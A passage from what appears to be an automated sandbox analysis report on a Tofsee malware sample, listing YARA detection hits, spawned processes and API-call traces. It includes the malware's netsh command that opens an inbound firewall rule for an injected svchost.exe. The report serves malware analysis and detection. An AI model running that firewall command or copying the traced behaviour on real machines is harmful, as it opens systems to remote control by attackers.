                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: unknown
                                                                                      • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 0000000C.00000002.2084599398.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000C.00000002.2086603974.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 0000000C.00000002.2086603974.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 0000000C.00000002.2086603974.0000000002DF0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.2086252389.0000000002622000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000C.00000003.2084057057.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 0000000C.00000003.2084057057.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 0000000C.00000003.2084057057.0000000002D90000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:13
                                                                                      Start time:09:14:53
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\SysWOW64\netsh.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                      Imagebase:0x1080000
                                                                                      File size:82'432 bytes
                                                                                      MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:14
                                                                                      Start time:09:14:53
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6d64d0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Target ID:15
                                                                                      Start time:09:14:54
                                                                                      Start date:07/09/2024
                                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:svchost.exe
                                                                                      Imagebase:0xce0000
                                                                                      File size:46'504 bytes
                                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Tofsee_26124fe4, Description: unknown, Source: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: MALWARE_Win_Tofsee, Description: Detects Tofsee, Source: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      Has exited:false

                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00000003), ref: 00409A7F
                                                                                        • SetErrorMode.KERNELBASE(00000003), ref: 00409A83
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00406511), ref: 00409A8A
                                                                                          • Part of subcall function 0040EC54: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
                                                                                          • Part of subcall function 0040EC54: GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
                                                                                          • Part of subcall function 0040EC54: GetTickCount.KERNEL32 ref: 0040EC78
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,0000012C), ref: 00409AB3
                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 00409ABA
                                                                                        • GetCommandLineA.KERNEL32 ref: 00409AFD
                                                                                        • lstrlenA.KERNEL32(?), ref: 00409B99
                                                                                        • ExitProcess.KERNEL32 ref: 00409C06
                                                                                        • GetTempPathA.KERNEL32(000001F4,?), ref: 00409CAC
                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 00409D7A
                                                                                        • lstrcatA.KERNEL32(?,?), ref: 00409D8B
                                                                                        • lstrcatA.KERNEL32(?,0041070C), ref: 00409D9D
                                                                                        • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 00409DED
                                                                                        • DeleteFileA.KERNEL32(00000022), ref: 00409E38
                                                                                        • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 00409E6F
                                                                                        • lstrcpyA.KERNEL32(?,00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409EC8
                                                                                        • lstrlenA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00409ED5
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000103,?), ref: 00409F3B
                                                                                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000022,?,?,?,00000000,00000103,?), ref: 00409F5E
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 00409F6A
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103), ref: 00409FAD
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FB4
                                                                                        • GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 00409FFE
                                                                                        • lstrcatA.KERNEL32(00000022,00000000), ref: 0040A038
                                                                                        • lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A05E
                                                                                        • lstrcatA.KERNEL32(00000022,00000022), ref: 0040A072
                                                                                        • lstrcatA.KERNEL32(00000022,00410A34), ref: 0040A08D
                                                                                        • wsprintfA.USER32 ref: 0040A0B6
                                                                                        • lstrcatA.KERNEL32(00000022,00000000), ref: 0040A0DE
                                                                                        • lstrcatA.KERNEL32(00000022,?), ref: 0040A0FD
                                                                                        • CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 0040A120
                                                                                        • DeleteFileA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 0040A131
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000022,0000012C), ref: 0040A174
                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 0040A17B
                                                                                        • GetDriveTypeA.KERNEL32(00000022), ref: 0040A1B6
                                                                                        • GetCommandLineA.KERNEL32 ref: 0040A1E5
                                                                                          • Part of subcall function 004099D2: lstrcpyA.KERNEL32(?,?,00000100,PromptOnSecureDesktop,00000000,?,00409E9D,?,00000022,?,?,?,?,?,?,?), ref: 004099DF
                                                                                          • Part of subcall function 004099D2: lstrcatA.KERNEL32(00000022,00000000,?,?,00409E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00409A3C
                                                                                          • Part of subcall function 004099D2: lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00409E9D,?,00000022,?,?,?), ref: 00409A52
                                                                                        • lstrlenA.KERNEL32(?), ref: 0040A288
                                                                                        • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040A3B7
                                                                                        • GetLastError.KERNEL32 ref: 0040A3ED
                                                                                        • Sleep.KERNEL32(000003E8), ref: 0040A400
                                                                                        • DeleteFileA.KERNEL32(004133D8), ref: 0040A407
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040405E,00000000,00000000,00000000), ref: 0040A42C
                                                                                        • WSAStartup.WS2_32(00001010,?), ref: 0040A43A
                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040877E,00000000,00000000,00000000), ref: 0040A469
                                                                                        • Sleep.KERNEL32(00000BB8), ref: 0040A48A
                                                                                        • GetTickCount.KERNEL32 ref: 0040A49F
                                                                                        • GetTickCount.KERNEL32 ref: 0040A4B7
                                                                                        • Sleep.KERNEL32(00001A90), ref: 0040A4C3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$File$Module$CountCreateDeleteErrorHandleNameSleepTicklstrcpylstrlen$CommandDriveLineModeProcessThreadTimeType$AttributesCloseCtrlDispatcherEnvironmentExceptionExitFilterInformationLastOpenPathServiceStartStartupSystemTempUnhandledValueVariableVolumewsprintf
                                                                                        • String ID: "$"$"$%X%08X$D$P$PromptOnSecureDesktop$\
                                                                                        • API String ID: 2089075347-2824936573
                                                                                        • Opcode ID: 603121095b7679364f468b5179938349acae34033f0d3c12a89c9af7faf008a0
                                                                                        • Instruction ID: 9e8e6158c267d4507ba39c142606b205eb09e8ef63bc9ae6e883bbf27c052806
                                                                                        • Opcode Fuzzy Hash: 603121095b7679364f468b5179938349acae34033f0d3c12a89c9af7faf008a0
                                                                                        • Instruction Fuzzy Hash: 4A5291B1D40259BBDB11DBA1CC49EEF7BBCAF04304F1444BBF509B6182D6788E948B69
                                                                                        APIs
                                                                                        • GetVersionExA.KERNEL32(?,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409340
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 0040936E
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00409DD7,?,00000022,?,?,00000000,00000001), ref: 00409375
                                                                                        • wsprintfA.USER32 ref: 004093CE
                                                                                        • wsprintfA.USER32 ref: 0040940C
                                                                                        • wsprintfA.USER32 ref: 0040948D
                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,00000000,?,?,00000000,00000101,?), ref: 004094F1
                                                                                        • RegQueryValueExA.KERNELBASE(?,00000000,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409526
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,00000000,?,?,?,?,?,00000000,00000101,?), ref: 00409571
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf$Module$CloseFileHandleNameOpenQueryValueVersion
                                                                                        • String ID: PromptOnSecureDesktop$runas
                                                                                        • API String ID: 3696105349-2220793183
                                                                                        • Opcode ID: b115644d8fcf1706915678c94d32f66e2b06ae170b0cb428a55680f7bdd6b1eb
                                                                                        • Instruction ID: b6d0878b1d73306239325ce20442e1ed3f1d42e4277a972a89fda7ad6b3a58d4
                                                                                        • Opcode Fuzzy Hash: b115644d8fcf1706915678c94d32f66e2b06ae170b0cb428a55680f7bdd6b1eb
                                                                                        • Instruction Fuzzy Hash: A7A181B2540208BBEB21DFA1CC45FDF3BACEB44744F104437FA05A2192D7B999848FA9
                                                                                        APIs
                                                                                        • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,75918A60,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406A7D
                                                                                        • GetDiskFreeSpaceA.KERNELBASE(00409E9D,00409A60,?,?,?,PromptOnSecureDesktop,?,?,?,00409A60,?,?,00409E9D), ref: 00406ABB
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B40
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B4E
                                                                                        • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B5F
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B6F
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B7D
                                                                                        • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B80
                                                                                        • GetLastError.KERNEL32(?,?,?,00409A60,?,?,00409E9D,?,?,?,?,?,00409E9D,?,00000022,?), ref: 00406B96
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseErrorLast$FileHandle$ChangeCreateDeleteDiskFindFreeNotificationSpace
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 1251348514-2980165447
                                                                                        • Opcode ID: 362dcede7d5d7e1862a192dbfd3c9a0fc2e91233da1497f7250b4d19aff3169c
                                                                                        • Instruction ID: ab228a986819567a034f5778c60117e3a6ddbbfebf067212e33de9fc62893814
                                                                                        • Opcode Fuzzy Hash: 362dcede7d5d7e1862a192dbfd3c9a0fc2e91233da1497f7250b4d19aff3169c
                                                                                        • Instruction Fuzzy Hash: 6C31F1B2900108BFDB00DFA09D44ADF7F78EF48310F158076E212F7291D674A9618F69
                                                                                        APIs
                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
                                                                                        • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
                                                                                        • GetTickCount.KERNEL32 ref: 0040EC78
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Time$CountFileInformationSystemTickVolume
                                                                                        • String ID:
                                                                                        • API String ID: 1209300637-0
                                                                                        • Opcode ID: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                        • Instruction ID: 1673bc13977c8672636575d9c8a2f9c2942a42ce341afdc75306ae3be589e196
                                                                                        • Opcode Fuzzy Hash: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
                                                                                        • Instruction Fuzzy Hash: 6BE0BFF5810104FFEB11EBB0EC4EEBB7BBCFB08315F504661B915D6090DAB49A448B64
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .$GetProcAddress.$l
                                                                                        • API String ID: 0-2784972518
                                                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                        • Instruction ID: 4c179cc9f1fbbad5c01b9e411db6f09a13f0a630f043a6fe6fc99bf0778dc4f6
                                                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                        • Instruction Fuzzy Hash: 973128B6900609DFDB10CF99C880AAEBBF5FF48324F19544AD841AB354D771EA85CBA4
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0267908E
                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 026790AE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081266908.0000000002669000.00000040.00000020.00020000.00000000.sdmp, Offset: 02669000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                        • String ID:
                                                                                        • API String ID: 3833638111-0
                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                        • Instruction ID: 17b94bab2789fee953e228ab240145e13e27ef9d635636704f6f942b25b2cfa5
                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                        • Instruction Fuzzy Hash: 16F06D36611714ABD7203AF9A88CF6E76F8EF89725F10062CE642925C0DB70E8458A61
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,80000001,0040EBFE,7FFF0001,?,0040DB55,7FFF0001), ref: 0040EBD3
                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,0040DB55,7FFF0001), ref: 0040EBDA
                                                                                          • Part of subcall function 0040EB74: GetProcessHeap.KERNEL32(00000000,00000000,0040EC28,00000000,?,0040DB55,7FFF0001), ref: 0040EB81
                                                                                          • Part of subcall function 0040EB74: HeapSize.KERNEL32(00000000,?,0040DB55,7FFF0001), ref: 0040EB88
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$Process$AllocateSize
                                                                                        • String ID:
                                                                                        • API String ID: 2559512979-0
                                                                                        • Opcode ID: ee98881387dc159fbc66546a2e4b1eb81700a9f94495ef156612fafc796680c8
                                                                                        • Instruction ID: 42103369b453d960252fa070f8f6fdc0a0ffae9c693debdf4c74a5c852f77059
                                                                                        • Opcode Fuzzy Hash: ee98881387dc159fbc66546a2e4b1eb81700a9f94495ef156612fafc796680c8
                                                                                        • Instruction Fuzzy Hash: 54C0803210422077C60127A57C0CEDA3E74DF04352F084425F505C1160CB794880879D
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,00000000,00020119,00000000,?,75920F10,00000000), ref: 00407472
                                                                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00000101,?,?,?,?,?,?,?,75920F10,00000000), ref: 004074F0
                                                                                        • RegQueryValueExA.ADVAPI32(?,00000000,?,00000000,?,?,00000104,?,?,?,?,?,?,75920F10,00000000), ref: 00407528
                                                                                        • ___ascii_stricmp.LIBCMT ref: 0040764D
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,75920F10,00000000), ref: 004076E7
                                                                                        • RegEnumKeyA.ADVAPI32(00000000,00000000,?,00000104), ref: 00407706
                                                                                        • RegCloseKey.KERNELBASE(00000000,?,?,?,?,?,?,75920F10,00000000), ref: 00407717
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,75920F10,00000000), ref: 00407745
                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,75920F10,00000000), ref: 004077EF
                                                                                          • Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,PromptOnSecureDesktop,000000C8,00407150,?), ref: 0040F1AD
                                                                                        • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040778F
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004077E6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
                                                                                        • String ID: "$PromptOnSecureDesktop
                                                                                        • API String ID: 3433985886-3108538426
                                                                                        • Opcode ID: 58688efdc745e23d79e1c9d42d0b110b33b2b67bc428880df89735915a056cb6
                                                                                        • Instruction ID: 2be8177c38fcb0431c37abdcb30432b02610efeff0693f38a05b2573c300e2d4
                                                                                        • Opcode Fuzzy Hash: 58688efdc745e23d79e1c9d42d0b110b33b2b67bc428880df89735915a056cb6
                                                                                        • Instruction Fuzzy Hash: E8C1F171D04209ABEB119BA5DC45BEF7BB9EF04310F1004B7F504B72D1EA79AE908B69
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000101,75920F10,?,75920F10,00000000), ref: 004070C2
                                                                                        • RegEnumValueA.KERNELBASE(75920F10,00000000,?,00000020,00000000,00000000,00000000,0000012C,?,75920F10,00000000), ref: 0040719E
                                                                                        • RegCloseKey.KERNELBASE(75920F10,?,75920F10,00000000), ref: 004071B2
                                                                                        • RegCloseKey.ADVAPI32(75920F10), ref: 00407208
                                                                                        • RegCloseKey.ADVAPI32(75920F10), ref: 00407291
                                                                                        • ___ascii_stricmp.LIBCMT ref: 004072C2
                                                                                        • RegCloseKey.ADVAPI32(75920F10), ref: 004072D0
                                                                                        • RegCloseKey.ADVAPI32(75920F10), ref: 00407314
                                                                                        • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040738D
                                                                                        • RegCloseKey.ADVAPI32(75920F10), ref: 004073D8
                                                                                          • Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,PromptOnSecureDesktop,000000C8,00407150,?), ref: 0040F1AD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close$AttributesEnumFileOpenValue___ascii_stricmplstrlen
                                                                                        • String ID: $"$PromptOnSecureDesktop
                                                                                        • API String ID: 4293430545-98143240
                                                                                        • Opcode ID: 74e128f8df151d438ab4d1c82f82d45ce79a9eea08151c9b6eb13cdb2253fb65
                                                                                        • Instruction ID: bdd769efad709bd93da993ba4a974553bca105625a5613f565cdc8f40f8c6bf1
                                                                                        • Opcode Fuzzy Hash: 74e128f8df151d438ab4d1c82f82d45ce79a9eea08151c9b6eb13cdb2253fb65
                                                                                        • Instruction Fuzzy Hash: 8FB17F71D0820ABAEB159FA1DC45BEF77B8AB04304F10047BF501F61D1EB79AA94CB69
                                                                                        APIs
                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?,75920F10,00000000), ref: 0040677E
                                                                                        • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,?,75920F10,00000000), ref: 0040679A
                                                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,75920F10,00000000), ref: 004067B0
                                                                                        • SetFileAttributesA.KERNEL32(?,00000002,?,75920F10,00000000), ref: 004067BF
                                                                                        • GetFileSize.KERNEL32(000000FF,00000000,?,75920F10,00000000), ref: 004067D3
                                                                                        • ReadFile.KERNELBASE(000000FF,?,00000040,00408244,00000000,?,75920F10,00000000), ref: 00406807
                                                                                        • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,75920F10,00000000), ref: 0040681F
                                                                                        • ReadFile.KERNELBASE(000000FF,?,000000F8,?,00000000,?,75920F10,00000000), ref: 0040683E
                                                                                        • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,75920F10,00000000), ref: 0040685C
                                                                                        • ReadFile.KERNEL32(000000FF,?,00000028,00408244,00000000,?,75920F10,00000000), ref: 0040688B
                                                                                        • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000000,?,75920F10,00000000), ref: 00406906
                                                                                        • ReadFile.KERNEL32(000000FF,004121A8,00000000,00408244,00000000,?,75920F10,00000000), ref: 0040691C
                                                                                        • FindCloseChangeNotification.KERNELBASE(000000FF,?,75920F10,00000000), ref: 00406971
                                                                                          • Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
                                                                                          • Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$Read$Pointer$AttributesCreateHeap$ChangeCloseFindFreeNotificationProcessSize
                                                                                        • String ID:
                                                                                        • API String ID: 1400801100-0
                                                                                        • Opcode ID: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
                                                                                        • Instruction ID: 23622665348289c9bdc7ba1e7bdf6275147e3319f3664adf7917ee5564634b96
                                                                                        • Opcode Fuzzy Hash: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
                                                                                        • Instruction Fuzzy Hash: E47109B1D00219EFDB109FA5CC809EEBBB9FB04314F11457AF516B6290E7349EA2DB54
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0261024D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID: cess$kernel32.dll
                                                                                        • API String ID: 4275171209-1230238691
                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                        • Instruction ID: 5774ec0492e1ed75388dcceda0e4cbf8f0944c93cfc0f584de3cb1d391b68c67
                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                        • Instruction Fuzzy Hash: 1A526974A01229DFDB64CF68C985BACBBB1BF09304F1480D9E94DAB351DB30AA95DF14
                                                                                        APIs
                                                                                        • lstrcpyA.KERNEL32(?,?,00000100,PromptOnSecureDesktop,00000000,?,00409E9D,?,00000022,?,?,?,?,?,?,?), ref: 004099DF
                                                                                        • lstrcatA.KERNEL32(00000022,00000000,?,?,00409E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00409A3C
                                                                                        • lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00409E9D,?,00000022,?,?,?), ref: 00409A52
                                                                                          • Part of subcall function 00406A60: CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,75918A60,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406A7D
                                                                                          • Part of subcall function 00406A60: GetDiskFreeSpaceA.KERNELBASE(00409E9D,00409A60,?,?,?,PromptOnSecureDesktop,?,?,?,00409A60,?,?,00409E9D), ref: 00406ABB
                                                                                          • Part of subcall function 00406A60: GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B40
                                                                                          • Part of subcall function 00406A60: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B4E
                                                                                          • Part of subcall function 00406A60: DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B80
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
